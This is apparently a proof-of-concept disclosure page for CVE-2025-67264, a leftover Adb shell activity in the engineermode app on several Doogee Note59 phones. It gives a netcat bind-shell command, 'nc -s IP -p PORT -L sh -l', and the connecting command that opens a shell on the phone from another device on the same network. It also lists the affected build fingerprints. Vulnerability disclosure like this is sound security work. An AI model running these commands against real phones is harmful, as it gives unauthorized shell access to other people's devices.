4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-31710
README.md
Rendering markdown...
POC / CVE-2025-67264.md MD
⬇ Raw GitHub ✕ Close 
CVE-2025-67264

This is another case where Doogee here on their unisoc units on com.sprd.engineermode on Android 15 forgot to remove the Adb shell activity. We have 3 models impacted, listed above with the fingerprints, because them use the same exact apk (same shasum aeb125dfb4c64d919c60364fc75a23f94ddfece5), them are running on Android 15 which should be patched, as unisoc removed the Adb shell activity on Android 14 and have tool_service of course but both the boot image and engineermode report as them are running android 13, the size of engineermode is 9MB so it is the patched version however they probably used the Android 13 vndk and built the stock system as a pseudo gsi or i don't know, the result is that they reintroduced [this](https://nvd.nist.gov/vuln/detail/CVE-2025-31710) vulnerability, the app on these models has the Adb shell activity and allows a reverse shell, but it is not system, so it is not possible to run the com.sammy.systools libs as binaries, source scripts or browse /sdcard, however, on the command for the reverse shell you can change the IP address to 0.0.0.0 or input the IP of the phone instead of 127.0.0.1, and then you can connect from another device with the same phone IP assuming the device you are connecting from is on the same network as the phone.
The vulnerability works as explained on main readme and as showed on screenshots (i will hide the ip), you will have to insert on the Adb shell prompt "nc -s IP -p PORT -L sh -l" and press start, after opening it with adb shell on pc or root activity launcher, as this time the app doesn't require to be ran from the dialer, replacing IP and PORT accordingly, then connect from the terminal with "nc IP PORT".

<img width="366" height="848" alt="RCE1" src="https://github.com/user-attachments/assets/c2109d1d-d205-40cd-9175-fa0589fdca08" /> <img width="757" height="175" alt="RCE2" src="https://github.com/user-attachments/assets/0401e4ca-e80d-40c9-a059-09207d381bac" />

Models impacted

Doogee Note59 Pro+

DOOGEE/1929ST/1929ST:15/AP3A.240905.015.A2/20250402:user/release-keys

DOOGEE/1929ST/1929ST:15/AP3A.240905.015.A2/20250910:user/release-keys

Doogee Note59 Pro

DOOGEE/1929SH_EEA/1929SH:15/AP3A.240905.015.A2/20250310:user/release-keys

Doogee Note59

DOOGEE/1929SC_EEA/1929SC:15/AP3A.240905.015.A2/20250226:user/release-keys